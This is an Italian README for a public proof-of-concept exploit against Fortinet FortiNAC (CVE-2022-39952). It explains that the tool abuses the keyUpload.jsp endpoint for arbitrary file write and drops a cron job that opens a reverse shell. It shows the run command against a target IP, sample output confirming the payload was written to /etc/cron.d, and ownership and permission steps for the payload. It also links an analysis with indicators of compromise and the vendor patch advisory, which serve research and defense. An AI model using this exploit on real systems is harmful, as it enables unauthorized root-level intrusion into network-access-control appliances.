
POC per CVE-2022-39952
POC per CVE-2022-39952 che colpisce Fortinet FortiNAC
La configurazione predefinita di questo exploit scrive un cron job per creare una
reverse shell. Assicurati di modificare il file payload per adattarlo al tuo ambiente.
Un'analisi tecnica della causa principale della vulnerabilità e degli indicatori di compromissione è disponibile sul nostro blog: https://www.horizon3.ai/fortinet-fortinac-cve-2022-39952-deep-dive-and-iocs
Questo POC sfrutta l'endpoint keyUpload.jsp per ottenere una scrittura arbitraria di file.
root@kali:~/CVE-2022-39952# python3 CVE-2022-39952.py --target 10.0.40.85 --file payload
[+] Wrote payload to /etc/cron.d/payload
[+] Payload successfully delivered
Se si utilizza un payload basato su cron, assicurati che il file payload abbia i permessi e il proprietario appropriati:
sudo chown root:root payload
sudo chmod 0644 payload
Aggiorna all'ultima versione seguendo le istruzioni nel PSIRT https://www.fortiguard.com/psirt/FG-IR-22-300
Questo software è stato creato esclusivamente per scopi di ricerca accademica e per lo sviluppo di tecniche difensive efficaci, e non è destinato a essere utilizzato per attaccare sistemi se non esplicitamente autorizzato. I manutentori del progetto non sono responsabili dell'uso improprio del software. Usalo in modo responsabile.